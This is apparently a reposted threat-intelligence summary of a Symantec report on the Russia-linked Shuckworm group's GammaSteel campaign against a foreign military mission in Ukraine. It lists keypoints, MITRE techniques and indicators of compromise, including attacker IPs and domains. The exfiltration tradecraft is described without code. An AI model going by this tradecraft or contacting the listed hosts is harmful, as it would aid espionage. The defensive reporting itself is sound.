FOCUS MODE
EXTRACT IOC
Threat Research

Shuckworm Targets Foreign Military Mission Based in Ukraine

Symantec
Shuckworm Targets Foreign Military Mission Based in Ukraine
Shuckworm, a Russia-linked espionage group, continues to target Ukraine, focusing on military missions of Western countries. Utilizing an updated GammaSteel tool, the group has shifted from VBS scripts to PowerShell-based methods and employs various ransom exfiltration techniques, including leveraging legitimate web services. The campaign demonstrates increased sophistication in data exfiltration methods and obfuscation strategies. Affected: Ukraine, Western military missions

Keypoints :

  • Shuckworm has continued its focus on Ukraine into 2025, targeting military operations.
  • The initial infection vector was an infected removable drive.
  • GammaSteel, an updated infostealer tool, is being used for data exfiltration.
  • The group employs methods like cURL and Tor for obfuscation and data transfer.
  • There’s a noticeable shift from VBS scripts to PowerShell tools.
  • The campaign includes advanced obfuscation techniques to minimize detection risks.
  • Shuckworm operates on behalf of the Russian Federal Security Service (FSB).
  • The attack chain involves multi-staged infection methods and registry modifications.
  • Exfiltrated information includes usernames, disk serial numbers, and environment details.
  • Attackers utilize legitimate services to disguise their command and control (C&C) communications.

MITRE Techniques :

  • T1068: Exploitation of Privilege Vulnerabilities – Utilization of system vulnerabilities via obfuscated PowerShell commands.
  • T1071.001: Application Layer Protocol: Web Protocols – Data exfiltration through web services like cURL and write.as.
  • T1041: Exfiltration Over Command and Control Channel – Use of HTTP(S) methods to transmit exfiltrated data.
  • T1059.001: Command and Scripting Interpreter: PowerShell – Execution of PowerShell scripts for reconnaissance and exfiltration.
  • T1070: Indicator Removal on Host – Modification of registry keys to hide malicious files and processes.
  • T1027: Obfuscated Files or Information – Deployment of heavily obfuscated scripts to evade detection.

Indicator of Compromise :

  • [URL] hxxps://write.as/api/posts
  • [IP Address] 107.189.19.218
  • [IP Address] 3.73.33.225
  • [Domain] nav-ni-furnished-handy.trycloudflare[.]com
  • [Domain] areas-apps-civic-loving.trycloudflare[.]com

Full Story: https://symantec-enterprise-blogs.security.com/threat-intelligence/shuckworm-ukraine-gammasteel

Views: 25

Tags: TOOL, RECONNAISSANCE, GOVERNMENT, DNS, PERSISTENCE, PAYLOAD, EXFILTRATION, BACKUP